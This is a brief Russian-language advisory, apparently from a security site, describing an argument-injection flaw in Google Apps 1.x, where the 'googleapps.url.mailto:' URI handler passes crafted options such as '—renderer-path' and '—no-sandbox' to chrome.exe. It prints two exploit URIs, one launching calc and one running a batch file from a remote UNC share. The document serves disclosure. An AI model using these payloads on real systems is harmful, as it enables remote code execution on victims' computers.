Программа: Google Apps 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
googleapps.exe при обработке аргументов, полученных через "googleapps.url.mailto:"
URI. Атакующий может передать специально сформированные аргументы в chrome.exe и
указать опцию "—renderer-path", что позволит выполнить произвольные приложения
на целевой системе.

Эксплоит:

googleapps.url.mailto://"%20—domain="—what%20—renderer-path=calc%20—no-sandbox%20—x"/

googleapps.url.mailto://"%20—domain="—x%20—renderer-path=\\192.168.0.1\uncshare\sh.bat%20—no-sandbox%20—x"/



Оставить мнение